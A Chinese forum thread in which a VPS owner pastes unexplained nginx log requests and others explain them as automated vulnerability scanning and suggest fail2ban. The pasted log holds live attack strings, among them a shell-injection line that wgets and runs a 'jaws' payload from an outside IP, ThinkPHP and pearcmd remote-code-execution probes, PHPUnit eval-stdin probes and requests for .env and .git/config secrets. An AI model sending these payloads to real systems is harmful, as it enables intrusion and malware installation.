vps被未知请求

今天看了下vps的nginx日志,发现有一些莫名的请求,不知道是谁发起的,要干什么,也没有人认识这些路径是干什么的
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/?XDEBUG_SESSION_START=phpstorm
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-login.php
/wp-admin/setup-config.php
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wordpress/wp-admin/setup-config.php
/.well-known/security.txt
/webui/
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/sub?token=BB662162-141B-4148-9201-C307B75170CB
/sitemap.xml
/shell?cd+/tmp;rm±rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws
/settings/.env
/resolve?name=example.com&type=A
/resolve?dns=SpsBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/resolve?dns=1NsBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/raephaeyeip4fawe
/query?name=example.com&type=A
/query?dns=YGsBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/query?dns=D9sBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=Hello
/public/.git/config
/_profiler/phpinfo
/phpunit/Util/PHP/eval-stdin.php
/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/Util/PHP/eval-stdin.php
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/owa/auth/logon.aspx
/owa
/?name=example.com&type=A
/media…/.git/config
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/info/panel/
/info/assets/vue/vue.min.js?2.4.7
/info/assets/qs/qs.min.js
/info/assets/moment/moment.min.js
/info/assets/js/util/utils.js?2.4.7
/info/assets/js/util/date-util.js?2.4.7
/info/assets/js/util/common.js?2.4.7
/info/assets/js/langs.js
/info/assets/js/axios-init.js?2.4.7
/info/assets/element-ui/theme-chalk/display.css
/info/assets/css/custom.min.css?2.4.7
/info/assets/axios/axios.min.js?2.4.7
/info/assets/ant-design-vue/antd.min.js
/info/assets/ant-design-vue/antd.min.css
/info/
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=Hello
/index.php?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
/index.php?lang=…/…/…/…/…/…/…/…/tmp/index1
/images/2.jpg
/.git/config
/geoserver/web/
/files/.git/config
/favicon.ico
/ews
/.env.tmp
/.env.testing
/.env.sandbox
/.env.qa
/.env.prod
/.env.preprod
/.env.dist
/.env.dev
/.env.ci
/.env
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/dns-query?name=example.com&type=A
/dns-query?dns=m_YBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/dns-query?dns=lkMBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/?dns=bfcBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/?dns=3pMBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/containers/json
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/.env
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/admin/modules/framework/amp_conf/htdocs/admin/config.php
/admin/.git/config
/admin/config.php
/admin/assets/js/views/login.js
/actuator/health
/actuator/gateway/routes
/7f22cd18
/65d696c0

1 个赞

批量扫漏洞的 看看你服务器上有没有一些已知的远程代码执行漏洞

我在上面搭建了一个3x-ui

就是脚本小子,跟你在 vps 上做了什么没关系,脚本全网扫的,可以针对性写个 fail2ban 禁用 IP

2 个赞

正常,扫你漏洞的,放公网就这样。

1 个赞

这就是全网扫描 ,正常的

在扫路径呢
习惯就好。公网是这样的